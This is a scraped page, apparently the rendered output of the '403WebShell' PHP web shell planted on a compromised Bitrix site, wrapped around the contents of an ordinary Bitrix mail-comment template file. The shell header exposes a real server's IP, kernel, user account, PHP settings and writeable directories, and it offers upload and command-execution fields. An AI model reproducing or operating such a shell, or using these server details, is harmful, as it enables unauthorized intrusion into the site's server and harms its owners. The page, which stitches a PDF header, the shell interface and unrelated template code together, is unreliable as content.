%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.12.148.234
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/main.post.list/templates/mail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/main.post.list/templates/mail/template.php
<?if(!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED!==true)die();

ob_start();
?>
	<tr>
		<td valign="top" align="center" style="#CLASSNAME#border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;line-height: 0;padding: 12px 15px 12px 19px;vertical-align: top;width: 39px;">
			<img height="<?=$arParams["AVATAR_SIZE"]?>" width="<?=$arParams["AVATAR_SIZE"]?>" src="#AUTHOR_AVATAR#" alt="#AUTHOR_NAME#" style="outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;border-radius: 50%;height: 39px;width: 39px;">
		</td>
		<td valign="top" style="#CLASSNAME#border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;color: #000000;font-size: 13px;line-height: 20px;padding: 12px 15px 15px 0;">
			<span style="color: #0b66c3;font-size: 13px;font-weight: bold;line-height: 16px;vertical-align: top;">#AUTHOR_NAME#</span>
			&nbsp;
			<span style="color: #999999;font-size: 11px;line-height: 16px;vertical-align: top;">#DATE#</span>
			<br>
			#TEXT#
			#AFTER#
		</td>
	</tr>
<?
$template = preg_replace("/[\t\n]/", "", ob_get_clean());

if (!empty($arParams["RECORDS"]))
{
	?><tr>
		<td valign="top" align="left" style="border-collapse: collapse;border-spacing: 0;padding: 0 0 36px;">
			<table cellspacing="0" cellpadding="0" border="0" align="left" style="border-collapse: collapse;mso-table-lspace: 0pt;font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;background-color: #f5f7f8;width: 100%;">
				<tr>
					<td border="0" valign="top" align="center" bgcolor="#ffffff" style="border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;line-height: 10px;padding: 0;vertical-align: top;width: 39px;border: none;background-color: #ffffff;height: 10px;text-align: center;"><?
						$src = $this->getFolder()."/images/comments-corner.gif";
						?><img src="<?=$src?>" alt="" style="outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;display: inline-block;vertical-align: top;">
					</td>
					<td border="0" bgcolor="#ffffff" style="border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;color: #000000;font-size: 13px;line-height: 20px;padding: 0;border: none;background-color: #ffffff;height: 10px;"></td>
				</tr><?

				if (
					$arParams["COMMENTS_COUNT"] > 0
					&& $arParams["COMMENTS_ALL_COUNT"] > $arParams["COMMENTS_COUNT"]
				)
				{
					?><tr>
						<td valign="middle" colspan="2" style="border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;line-height: 0;padding: 0 0 0 16px;vertical-align: middle;width: 39px;color: #2067b0;height: 38px;font-size: 12px;">
							<a href="<?=$arParams["POST_URL"]?>" style="color: #146cc5;"><?=GetMessage('MPL_MAIL_MORE_COMMENTS1', array("#NUM#" => ($arParams["COMMENTS_ALL_COUNT"] - $arParams["COMMENTS_COUNT"])))?></a>
						</td>
					</tr><?
				}

				$arParams["AVATAR_DEFAULT"] = $this->getFolder()."/images/userpic.gif";

				$i = 0;
				foreach ($arParams["RECORDS"] as $res)
				{
					$res["AUTHOR"] = (is_array($res["AUTHOR"]) ? $res["AUTHOR"] : array());
					$res["CLASSNAME"] = (
						$arParams["HIGHLIGHT"] == "Y"
						&& $i == (count($arParams["RECORDS"]) - 1)
							? 'background-color:#fffcee;'
							: ''
					);

					?><?=$this->__component->parseTemplate($res, $arParams, $template)?><?
					$i++;
				}

				?>
				<tr>
					<td valign="top" align="center" style="border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;line-height: 0;padding: 12px 15px 12px 19px;vertical-align: top;width: 39px;height: 39px;"><?
						$src = $this->getFolder()."/images/userpic.gif";
						?><img height="39" width="39" src="<?=$src?>" alt="" style="outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;border-radius: 50%;height: 39px;width: 39px;">
					</td>
					<td style="border-collapse: collapse;border-spacing: 0;border-bottom: 2px solid #FFFFFF;color: #80868e;font-size: 13px;line-height: 20px;padding: 12px 15px 15px 0;height: 39px;">
						<a href="<?=$arParams["POST_URL"]?>" style="color: #80868e;"><?=GetMessage('MPL_MAIL_ADD_COMMENT_LINK')?></a>
					</td>
				</tr>
			</table>
		</td>
	</tr><?
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit